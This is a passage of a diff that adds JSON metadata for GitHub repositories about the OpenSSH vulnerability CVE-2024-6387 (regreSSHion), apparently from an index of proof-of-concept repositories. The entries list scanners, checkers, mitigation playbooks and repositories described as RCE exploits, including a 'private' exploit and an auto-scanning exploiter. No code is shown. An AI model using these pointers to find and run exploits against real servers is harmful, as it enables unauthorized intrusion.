"https:\/\/github.com\/3yujw7njai\/CVE-2024-6387", + "description": "SSH RCE PoC CVE-2024-6387", + "fork": false, + "created_at": "2024-07-02T01:08:05Z", + "updated_at": "2024-12-08T12:40:56Z", + "pushed_at": "2024-07-02T01:13:22Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 822860717, + "name": "OpenSSH-Vulnerability-test", + "full_name": "betancour\/OpenSSH-Vulnerability-test", + "owner": { + "login": "betancour", + "id": 283403, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/283403?v=4", + "html_url": "https:\/\/github.com\/betancour", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/betancour\/OpenSSH-Vulnerability-test", + "description": "OpenSSH CVE-2024-6387 Vulnerability Checker", + "fork": false, + "created_at": "2024-07-02T01:24:04Z", + "updated_at": "2024-12-24T09:30:51Z", + "pushed_at": "2024-07-02T01:31:11Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 822879505, + "name": "CVE-2024-6387fixshell", + "full_name": "muyuanlove\/CVE-2024-6387fixshell", + "owner": { + "login": "muyuanlove", + "id": 41590587, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41590587?v=4", + "html_url": "https:\/\/github.com\/muyuanlove", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/muyuanlove\/CVE-2024-6387fixshell", + "description": null, + "fork": false, + "created_at": "2024-07-02T02:35:24Z", + "updated_at": "2024-07-02T06:18:19Z", + "pushed_at": "2024-07-02T02:39:40Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 822883843, + "name": "CVE-2024-6387", + "full_name": "TAM-K592\/CVE-2024-6387", + "owner": { + "login": "TAM-K592", + "id": 8276702, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8276702?v=4", + "html_url": "https:\/\/github.com\/TAM-K592", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TAM-K592\/CVE-2024-6387", + "description": "Recently, the OpenSSH maintainers released security updates to fix a critical vulnerability that could lead to unauthenticated remote code execution (RCE) with root privileges. This vulnerability, identified as CVE-2024-6387, resides in the OpenSSH server component (sshd), which is designed to listen for connections from client applications.", + "fork": false, + "created_at": "2024-07-02T02:51:37Z", + "updated_at": "2024-12-28T05:47:38Z", + "pushed_at": "2024-07-02T03:23:00Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 822884531, + "name": "regreSSHion", + "full_name": "teamos-hub\/regreSSHion", + "owner": { + "login": "teamos-hub", + "id": 172880130, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/172880130?v=4", + "html_url": "https:\/\/github.com\/teamos-hub", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/teamos-hub\/regreSSHion", + "description": "This is a POC I wrote for CVE-2024-6387", + "fork": false, + "created_at": "2024-07-02T02:54:05Z", + "updated_at": "2024-07-02T13:12:58Z", + "pushed_at": "2024-07-02T02:48:35Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 822897220, + "name": "CVE-2024-6387", + "full_name": "ahlfors\/CVE-2024-6387", + "owner": { + "login": "ahlfors", + "id": 1074291, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1074291?v=4", + "html_url": "https:\/\/github.com\/ahlfors", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ahlfors\/CVE-2024-6387", + "description": null, + "fork": false, + "created_at": "2024-07-02T03:42:35Z", + "updated_at": "2024-07-10T08:04:08Z", + "pushed_at": "2024-07-02T09:57:35Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 822898666, + "name": "CVE-2024-6387-checkher", + "full_name": "Mufti22\/CVE-2024-6387-checkher", + "owner": { + "login": "Mufti22", + "id": 75854478, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75854478?v=4", + "html_url": "https:\/\/github.com\/Mufti22", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mufti22\/CVE-2024-6387-checkher", + "description": null, + "fork": false, + "created_at": "2024-07-02T03:48:37Z", + "updated_at": "2024-07-02T03:49:10Z", + "pushed_at": "2024-07-02T03:49:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 822903933, + "name": "CVE-2024-6387-exploit", + "full_name": "thegenetic\/CVE-2024-6387-exploit", + "owner": { + "login": "thegenetic", + "id": 57350740, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57350740?v=4", + "html_url": "https:\/\/github.com\/thegenetic", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thegenetic\/CVE-2024-6387-exploit", + "description": "CVE-2024-6387 exploit", + "fork": false, + "created_at": "2024-07-02T04:09:44Z", + "updated_at": "2024-09-24T00:12:11Z", + "pushed_at": "2024-07-02T04:45:15Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 822953002, + "name": "CVE-2024-6387", + "full_name": "R4Tw1z\/CVE-2024-6387", + "owner": { + "login": "R4Tw1z", + "id": 150011273, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/150011273?v=4", + "html_url": "https:\/\/github.com\/R4Tw1z", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/R4Tw1z\/CVE-2024-6387", + "description": "This script, created by R4Tw1z, is designed to scan IP addresses to check if they are running a potentially vulnerable version of OpenSSH. The tool leverages multi-threading to optimize scanning performance and handle multiple IP addresses concurrently.", + "fork": false, + "created_at": "2024-07-02T06:40:09Z", + "updated_at": "2024-07-05T10:15:26Z", + "pushed_at": "2024-07-02T09:01:55Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 822958334, + "name": "CVE-2024-6387", + "full_name": "d0rb\/CVE-2024-6387", + "owner": { + "login": "d0rb", + "id": 10403781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10403781?v=4", + "html_url": "https:\/\/github.com\/d0rb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d0rb\/CVE-2024-6387", + "description": "This Python script exploits a remote code execution vulnerability (CVE-2024-6387) in OpenSSH.", + "fork": false, + "created_at": "2024-07-02T06:53:35Z", + "updated_at": "2025-01-05T15:46:06Z", + "pushed_at": "2024-07-04T20:04:30Z", + "stargazers_count": 35, + "watchers_count": 35, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 35, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 822978721, + "name": "regression-scanner", + "full_name": "CiderAndWhisky\/regression-scanner", + "owner": { + "login": "CiderAndWhisky", + "id": 30117084, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30117084?v=4", + "html_url": "https:\/\/github.com\/CiderAndWhisky", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CiderAndWhisky\/regression-scanner", + "description": "Used to detect ssh servers vulnerable to CVE-2024-6387. Shameless robbery from https:\/\/github.com\/bigb0x\/CVE-2024-6387 using ChatGPT to translate the code to PHP.", + "fork": false, + "created_at": "2024-07-02T07:42:46Z", + "updated_at": "2024-07-02T09:06:07Z", + "pushed_at": "2024-07-02T09:06:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 822991113, + "name": "CVE-2024-6387_PoC", + "full_name": "shamo0\/CVE-2024-6387_PoC", + "owner": { + "login": "shamo0", + "id": 48299520, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48299520?v=4", + "html_url": "https:\/\/github.com\/shamo0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shamo0\/CVE-2024-6387_PoC", + "description": "Script for checking CVE-2024-6387 (regreSSHion)", + "fork": false, + "created_at": "2024-07-02T08:13:23Z", + "updated_at": "2024-07-02T10:00:56Z", + "pushed_at": "2024-07-02T08:40:31Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "checker", + "cve-2024-6387", + "exploit", + "openssh", + "poc", + "rce", + "regresshion", + "ssh", + "vulnerability" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 822993766, + "name": "CVE-2024-6387-nmap", + "full_name": "paradessia\/CVE-2024-6387-nmap", + "owner": { + "login": "paradessia", + "id": 38862216, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38862216?v=4", + "html_url": "https:\/\/github.com\/paradessia", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/paradessia\/CVE-2024-6387-nmap", + "description": "CVE-2024-6387-nmap", + "fork": false, + "created_at": "2024-07-02T08:19:55Z", + "updated_at": "2024-07-31T06:59:27Z", + "pushed_at": "2024-07-02T08:26:46Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823030467, + "name": "CVE-2024-6387", + "full_name": "SecWithMoh\/CVE-2024-6387", + "owner": { + "login": "SecWithMoh", + "id": 92855054, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92855054?v=4", + "html_url": "https:\/\/github.com\/SecWithMoh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SecWithMoh\/CVE-2024-6387", + "description": "This Go program scans targets for CVE-2024-6387 in OpenSSH, categorizing servers by vulnerability status and port availability.", + "fork": false, + "created_at": "2024-07-02T09:41:40Z", + "updated_at": "2024-07-16T07:51:21Z", + "pushed_at": "2024-07-02T10:05:02Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823031972, + "name": "CVE-2024-6387-Updated-x64bit", + "full_name": "PrincipalAnthony\/CVE-2024-6387-Updated-x64bit", + "owner": { + "login": "PrincipalAnthony", + "id": 174432334, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/174432334?v=4", + "html_url": "https:\/\/github.com\/PrincipalAnthony", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PrincipalAnthony\/CVE-2024-6387-Updated-x64bit", + "description": "Private x64 RCE exploit for CVE-2024-6387 [02.07.2024] from exploit.in", + "fork": false, + "created_at": "2024-07-02T09:45:04Z", + "updated_at": "2024-07-02T15:52:27Z", + "pushed_at": "2024-07-02T09:46:08Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823040737, + "name": "CVE-2024-6387-POC", + "full_name": "skyalliance\/CVE-2024-6387-POC", + "owner": { + "login": "skyalliance", + "id": 127739423, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127739423?v=4", + "html_url": "https:\/\/github.com\/skyalliance", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/skyalliance\/CVE-2024-6387-POC", + "description": null, + "fork": false, + "created_at": "2024-07-02T10:05:43Z", + "updated_at": "2024-07-02T13:24:40Z", + "pushed_at": "2024-07-02T13:24:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823053102, + "name": "CVE-2024-6387-Mitigation-Ansible-Playbook", + "full_name": "daniel-odrinski\/CVE-2024-6387-Mitigation-Ansible-Playbook", + "owner": { + "login": "daniel-odrinski", + "id": 22768251, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22768251?v=4", + "html_url": "https:\/\/github.com\/daniel-odrinski", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/daniel-odrinski\/CVE-2024-6387-Mitigation-Ansible-Playbook", + "description": "An Ansible Playbook to mitigate the risk of RCE (CVE-2024-6387) until platforms update OpenSSH to a non-vulnerable version.", + "fork": false, + "created_at": "2024-07-02T10:34:17Z", + "updated_at": "2024-07-02T11:05:58Z", + "pushed_at": "2024-07-02T11:05:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823065840, + "name": "openssh-cve-2024-6387.sh", + "full_name": "rumochnaya\/openssh-cve-2024-6387.sh", + "owner": { + "login": "rumochnaya", + "id": 8115717, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8115717?v=4", + "html_url": "https:\/\/github.com\/rumochnaya", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rumochnaya\/openssh-cve-2024-6387.sh", + "description": "openssh-cve-2024-6387.sh", + "fork": false, + "created_at": "2024-07-02T11:05:07Z", + "updated_at": "2024-07-04T11:27:01Z", + "pushed_at": "2024-07-02T11:23:35Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823067387, + "name": "CVE-2024-6387-Mitigation", + "full_name": "zenzue\/CVE-2024-6387-Mitigation", + "owner": { + "login": "zenzue", + "id": 19271340, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19271340?v=4", + "html_url": "https:\/\/github.com\/zenzue", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zenzue\/CVE-2024-6387-Mitigation", + "description": "Mitigation Guide for CVE-2024-6387 in OpenSSH", + "fork": false, + "created_at": "2024-07-02T11:08:40Z", + "updated_at": "2024-07-02T11:17:15Z", + "pushed_at": "2024-07-02T11:17:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823086763, + "name": "CVE-2024-6387-Check", + "full_name": "devarshishimpi\/CVE-2024-6387-Check", + "owner": { + "login": "devarshishimpi", + "id": 43378923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43378923?v=4", + "html_url": "https:\/\/github.com\/devarshishimpi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/devarshishimpi\/CVE-2024-6387-Check", + "description": "CVE-2024-6387 Checker is a fast, efficient tool for detecting OpenSSH servers vulnerable to the regreSSHion exploit. It quickly scans multiple IPs, domain names, and CIDR ranges to identify risks and help secure your infrastructure.", + "fork": false, + "created_at": "2024-07-02T11:55:39Z", + "updated_at": "2025-01-05T23:59:18Z", + "pushed_at": "2024-07-08T20:39:03Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bash", + "cve-2024-6387", + "cve-2024-6387-checker", + "devarshishimpi", + "openssh", + "openssh-client", + "openssh-server", + "openssh-sftp-server", + "regresshion", + "ssh", + "vulnerability-detection", + "vulnerability-scanners" + ], + "visibility": "public", + "forks": 3, + "watchers": 13, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 823099379, + "name": "cve-2024-6387_AImade", + "full_name": "hssmo\/cve-2024-6387_AImade", + "owner": { + "login": "hssmo", + "id": 99412060, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99412060?v=4", + "html_url": "https:\/\/github.com\/hssmo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hssmo\/cve-2024-6387_AImade", + "description": "cve-2024-6387_AImade", + "fork": false, + "created_at": "2024-07-02T12:24:25Z", + "updated_at": "2024-07-02T12:34:36Z", + "pushed_at": "2024-07-02T12:34:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823109994, + "name": "checker-CVE-2024-6387", + "full_name": "ACHUX21\/checker-CVE-2024-6387", + "owner": { + "login": "ACHUX21", + "id": 130113878, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130113878?v=4", + "html_url": "https:\/\/github.com\/ACHUX21", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ACHUX21\/checker-CVE-2024-6387", + "description": null, + "fork": false, + "created_at": "2024-07-02T12:48:27Z", + "updated_at": "2024-07-19T10:54:54Z", + "pushed_at": "2024-07-02T13:18:38Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823118069, + "name": "ssh_exploiter_CVE-2024-6387", + "full_name": "AiGptCode\/ssh_exploiter_CVE-2024-6387", + "owner": { + "login": "AiGptCode", + "id": 146197697, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/146197697?v=4", + "html_url": "https:\/\/github.com\/AiGptCode", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AiGptCode\/ssh_exploiter_CVE-2024-6387", + "description": "CVE-2024-6387 with auto ip scanner and auto expliot ", + "fork": false, + "created_at": "2024-07-02T12:57:35Z", + "updated_at": "2024-11-19T22:52:23Z", + "pushed_at": "2024-07-04T01:55:26Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "android", + "cve", + "cve-2024-6387", + "exploit", + "ftp", + "hack", + "hacktoberfest", + "kali", + "kali-linux", + "linux", + "openssh", + "python", + "python3", + "root", + "shell", + "ssh", + "windows" + ], + "visibility": "public", + "forks": 2, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823151186, + "name": "regreSSHion-nmap-scanner", + "full_name": "xristos8574\/regreSSHion-nmap-scanner", + "owner": { + "login": "xristos8574", + "id": 48923762, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48923762?v=4", + "html_url": "https:\/\/github.com\/xristos8574", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xristos8574\/regreSSHion-nmap-scanner", + "description": "A bash script for nmap to scan for vulnerable machines in regards to the latest CVE-2024-6387", + "fork": false, + "created_at": "2024-07-02T13:50:47Z", + "updated_at": "2024-07-02T13:52:27Z", + "pushed_at": "2024-07-02T13:52:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823184811, + "name": "regreSSHion", + "full_name": "xonoxitron\/regreSSHion", + "owner": { + "login": "xonoxitron", + "id": 7057784, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7057784?v=4", + "html_url": "https:\/\/github.com\/xonoxitron", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xonoxitron\/regreSSHion", + "description": "CVE-2024-6387 (regreSSHion) Exploit (PoC), a vulnerability in OpenSSH's server (sshd) on glibc-based Linux systems.", + "fork": false, + "created_at": "2024-07-02T14:41:43Z", + "updated_at": "2025-01-05T23:07:03Z", + "pushed_at": "2024-07-02T15:16:04Z", + "stargazers_count": 31, + "watchers_count": 31, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "c", + "cve-2024-6387", + "exploit", + "glibc", + "linux", + "openssh", + "poc", + "regresshion", + "sshd" + ], + "visibility": "public", + "forks": 8, + "watchers": 31, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 823199757, + "name": "CVE-2024-6387", + "full_name": "no-one-sec\/CVE-2024-6387", + "owner": { + "login": "no-one-sec", + "id": 118190089, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118190089?v=4", + "html_url": "https:\/\/github.com\/no-one-sec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/no-one-sec\/CVE-2024-6387", + "description": "开箱即用的AK47", + "fork": false, + "created_at": "2024-07-02T15:13:09Z", + "updated_at": "2024-07-02T15:14:52Z", + "pushed_at": "2024-07-02T15:13:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823199952, + "name": "CVE-2024-6387", + "full_name": "dawnl3ss\/CVE-2024-6387", + "owner": { + "login": "dawnl3ss", + "id": 52249849, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52249849?v=4", + "html_url": "https:\/\/github.com\/dawnl3ss", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dawnl3ss\/CVE-2024-6387", + "description": null, + "fork": false, + "created_at": "2024-07-02T15:13:33Z", + "updated_at": "2024-07-02T15:14:40Z", + "pushed_at": "2024-07-02T15:14:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823236084, + "name": "CVE-2024-6387-Exploit-POC", + "full_name": "MrR0b0t19\/CVE-2024-6387-Exploit-POC", + "owner": { + "login": "MrR0b0t19", + "id": 63489501, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63489501?v=4", + "html_url": "https:\/\/github.com\/MrR0b0t19", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MrR0b0t19\/CVE-2024-6387-Exploit-POC", + "description": null, + "fork": false, + "created_at": "2024-07-02T16:34:12Z", + "updated_at": "2024-07-14T06:25:24Z", + "pushed_at": "2024-07-02T16:38:33Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823250035, + "name": "CVE-2024-6387", + "full_name": "th3gokul\/CVE-2024-6387", + "owner": { + "login": "th3gokul", + "id": 89386101, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89386101?v=4", + "html_url": "https:\/\/github.com\/th3gokul", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/th3gokul\/CVE-2024-6387", + "description": "CVE-2024-6387 : Vulnerability Detection tool for regreSSHion Remote Unauthenticated Code Execution in OpenSSH Server", + "fork": false, + "created_at": "2024-07-02T17:04:52Z", + "updated_at": "2024-10-20T09:56:28Z", + "pushed_at": "2024-07-02T17:47:29Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823284825, + "name": "Test_CVE-2024-6387", + "full_name": "n1cks0n\/Test_CVE-2024-6387", + "owner": { + "login": "n1cks0n", + "id": 100887222, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100887222?v=4", + "html_url": "https:\/\/github.com\/n1cks0n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/n1cks0n\/Test_CVE-2024-6387", + "description": "Test_CVE-2024-6387 is a lightweight, efficient tool designed to identify servers running vulnerable versions of OpenSSH", + "fork": false, + "created_at": "2024-07-02T18:30:28Z", + "updated_at": "2024-07-02T18:31:58Z", + "pushed_at": "2024-07-02T18:31:41Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823285710, + "name": "CVE-2024-6387", + "full_name": "l0n3m4n\/CVE-2024-6387", + "owner": { + "login": "l0n3m4n", + "id": 143868630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/143868630?v=4", + "html_url": "https:\/\/github.com\/l0n3m4n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/l0n3m4n\/CVE-2024-6387", + "description": "PoC - Remote Unauthenticated Code Execution Vulnerability in OpenSSH server (Scanner and Exploit) ", + "fork": false, + "created_at": "2024-07-02T18:32:46Z", + "updated_at": "2024-12-30T01:05:18Z", + "pushed_at": "2024-07-05T15:19:28Z", + "stargazers_count": 72, + "watchers_count": 72, + "has_discussions": false, + "forks_count": 29, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2024-6387", + "exploit", + "openssh-server", + "payload", + "poc", + "python3", + "rce" + ], + "visibility": "public", + "forks": 29, + "watchers": 72, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 823291064, + "name": "CVE-2024-6387-Checker", + "full_name": "RickGeex\/CVE-2024-6387-Checker", + "owner": { + "login": "RickGeex", + "id": 7975904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7975904?v=4", + "html_url": "https:\/\/github.com\/RickGeex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RickGeex\/CVE-2024-6387-Checker", + "description": "CVE-2024-6387-Check is a streamlined and efficient tool created to detect servers operating on vulnerable versions of OpenSSH.", + "fork": false, + "created_at": "2024-07-02T18:46:24Z", + "updated_at": "2024-07-02T20:32:50Z", + "pushed_at": "2024-07-02T20:32:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823296113, + "name": "regreSSHion-checker", + "full_name": "xonoxitron\/regreSSHion-checker", + "owner": { + "login": "xonoxitron", + "id": 7057784, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7057784?v=4", + "html_url": "https:\/\/github.com\/xonoxitron", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xonoxitron\/regreSSHion-checker", + "description": "Quickly identifies servers vulnerable to OpenSSH 'regreSSHion' (CVE-2024-6387).", + "fork": false, + "created_at": "2024-07-02T18:59:54Z", + "updated_at": "2024-11-20T01:42:09Z", + "pushed_at": "2024-07-02T19:06:01Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-6387", + "glibc", + "golang", + "linux", + "openssh", + "regresshion", + "sshd" + ], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + 